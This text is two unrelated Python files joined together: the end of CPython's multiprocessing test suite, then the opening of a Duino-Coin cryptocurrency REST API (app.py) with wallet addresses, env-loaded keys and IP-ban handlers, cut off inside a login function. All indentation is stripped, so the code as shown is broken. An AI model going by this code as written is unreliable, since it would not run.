old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + 60
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
app.py
|
#!/usr/bin/env python3
"""
Duino-Coin REST API © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duco-rest-api
Duino-Coin Team & Community 2019-2021
"""
import gevent.monkey
gevent.monkey.patch_all()
from wrapped_duco_functions import *
from Server import (
now, SAVE_TIME, POOL_DATABASE, CONFIG_WHITELIST_USR,
jail, global_last_block_hash, HOSTNAME,
DATABASE, DUCO_EMAIL, DUCO_PASS, alt_check, acc_check,
DB_TIMEOUT, CONFIG_MINERAPI, SERVER_VER,
CONFIG_TRANSACTIONS, API_JSON_URI,
BCRYPT_ROUNDS, user_exists, SOCKET_TIMEOUT,
email_exists, send_registration_email,
DECIMALS, CONFIG_BANS, protocol_verified_mail,
CONFIG_JAIL, CONFIG_WHITELIST, perm_ban,
NodeS_Overide, CAPTCHA_SECRET_KEY)
from fastrand import pcg32bounded as fastrandint
from xxhash import xxh64
from hashlib import sha1
import threading
import traceback
import os
from json import load
from bcrypt import hashpw, gensalt, checkpw
from sqlite3 import connect as sqlconn
from time import sleep, time
from re import sub, match
from colorama import Back, Fore, Style, init
import smtplib
import ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from nano_lib_rvx import Account
from tronapi import HttpProvider
from tronapi import Tron
from cashaddress import convert
from bitcash import Key
import requests
import random
import json
from socket import socket
from flask_ipban import IpBan
from flask_limiter.util import get_remote_address
from flask_limiter import Limiter
from flask import Flask, request, jsonify, render_template
from flask_caching import Cache
import functools
from dotenv import load_dotenv
def forwarded_ip_check():
return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
def dbg(*message):
if "TX" in str(message):
fg_color = Fore.YELLOW
elif "EX" in str(message):
fg_color = Fore.CYAN
elif "Error" in str(message):
fg_color = Fore.RED
elif "Success" in str(message):
fg_color = Fore.GREEN
else:
fg_color = Fore.WHITE
print(now().strftime(
Style.RESET_ALL
+ Style.DIM
+ Fore.WHITE
+ "%H:%M:%S")
+ Style.BRIGHT
+ fg_color,
*message,
Style.RESET_ALL)
# Exchange settings
exchange_address = {
"duco": "coinexchange",
"xmg": "95JLhkyWVDce5D17LyApULc5YC4vrVzaio",
"lke": "Like3yYC34YQJRMQCSbTDWKLhnzCoZvo9AwWuu5kooh",
"bch": "bitcoincash:qpgpd7slludx5h9p53qwf8pxu9z702n95qteeyzay3",
"trx": "TQUowTaHwvkWHbNVkxkAbcnbYyhF4or1Qy",
"xrp": "rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ (Destination tag: 2039609160)",
"dgb": "DHMV4BNGpWbdhpq6Za3ArncuhpmtCjyQXg",
"nano": "nano_3fpqpbcgt3nga3s81td6bk7zcqdr7ockgnyjkcy1s8nfn98df6c5wu14fuuq",
"fjc": "FsfCoLL8JmLJoU57bUr2W3u3TA8acL9kf3",
"rvn": "RH4bTDaHH7LSSCVSvXJzJ5KkiGR1QRMaqN",
"nim": "NQ88 Q9ME 470X 8KY8 HXQG J96N 6FHR 8G0B EDMH"}
load_dotenv()
IPDB_KEY = os.getenv('IPDB_KEY')
PROXYCHECK_KEY = os.getenv('PROXYCHECK_KEY')
TRX_SECRET_KEY = os.getenv('TRX_SECRET_KEY')
BCH_SECRET_KEY = os.getenv('BCH_SECRET_KEY')
LIKECOIN_SECRET_KEY = os.getenv('LIKECOIN_SECRET_KEY')
NANO_SECRET_KEY = os.getenv('NANO_SECRET_KEY')
EXCHANGE_MAIL = DUCO_EMAIL
IP_CHECK_DISABLED = False
XXHASH_TX_PROB = 30
overrides = [
NodeS_Overide,
DUCO_PASS]
config = {
"DEBUG": False,
"CACHE_TYPE": "redis",
"CACHE_REDIS_URL": "redis://localhost:6379/0",
"CACHE_DEFAULT_TIMEOUT": SAVE_TIME,
"JSONIFY_PRETTYPRINT_REGULAR": False}
limiter = Limiter(
key_func=forwarded_ip_check,
default_limits=["5000 per day", "1 per 1 second"],)
ip_ban = IpBan(
ban_seconds=60*60,
ban_count=3,
persist=True,
ip_header='HTTP_X_REAL_IP',
record_dir="config/ipbans/",
ipc=True,
secret_key=DUCO_PASS,
abuse_IPDB_config={
"key": IPDB_KEY,
"report": True,
"load": False})
app = Flask(__name__, template_folder='config/error_pages')
app.config.from_mapping(config)
cache = Cache(app)
limiter.init_app(app)
ip_ban.init_app(app)
requests_session = requests.Session()
thread_lock = threading.Lock()
nano_key = Account(priv_key=NANO_SECRET_KEY)
bch_key = Key(BCH_SECRET_KEY)
trx_key = Tron(
full_node=HttpProvider('https://api.trongrid.io'),
solidity_node=HttpProvider('https://api.trongrid.io'),
event_server=HttpProvider('https://api.trongrid.io'))
trx_key.private_key = TRX_SECRET_KEY
trx_key.default_address = exchange_address["trx"]
last_transactions_update, last_miners_update, last_balances_update = 0, 0, 0
miners, balances, transactions = [], [], []
rate_count, last_transfer, checked_ips = {}, {}, {}
banlist, jailedusr, registrations, whitelisted_usr = [], [], [], []
with open('config/sell_email.html', 'r') as file:
html_exc = file.read()
with open('config/sell_email.html', 'r') as file:
html_auto = file.read()
with open('config/buy_email.html', 'r') as file:
html_buy = file.read()
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username)
dbg("Successfully loaded jailed usernames file")
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username)
dbg("Successfully loaded banned usernames file")
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username)
dbg("Successfully loaded whitelisted usernames file")
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip)
dbg("Successfully loaded whitelisted IPs file")
def likecoin_transaction(recipient: str, amount: int, comment: str):
data = {
"address": str(recipient),
"amount": str(int(amount) * 1000000000),
"comment": str(comment),
"prv": LIKECOIN_SECRET_KEY}
r = requests.post(
"https://wallet.likecoin.pro/api/v0/new-transfer",
data=data).json()
if "error" in r:
raise Exception(r["error"])
else:
return r["hash"]
def error_log(message: str):
with open('exchange_erorrs.txt', 'a') as file:
file.write(str(message))
observations = {}
@app.errorhandler(429)
def error429(e):
global observations
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 20:
dbg("Too many observations", ip_addr)
if not ip_addr in whitelist:
ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
limit_err = str(e).replace("429 Too Many Requests: ", "")
dbg("Error 429", ip_addr, limit_err, os.getpid())
return render_template('429.html', limit=limit_err), 429
@app.errorhandler(404)
def error404(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
page_name = str(request.url)
ip_ban.add(ip=ip_addr)
dbg("Error 404", ip_addr, page_name)
return render_template('404.html', page_name=page_name), 404
@app.errorhandler(500)
def error500(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
dbg("Error 500", ip_addr)
return render_template('500.html'), 500
@app.errorhandler(403)
def error403(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
ip_ban.block(ip_addr)
dbg("Error 403", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 40:
dbg("Too many observations - banning", ip_addr)
if not ip_addr in whitelist:
ip_addr_ban(ip_addr)
return render_template('403.html'), 403
def login(username: str, unhashed_pass: str):
if not match(r"^[A-Za-z0-9_-]*$", username):
return (False, "Incorrect username")
try:
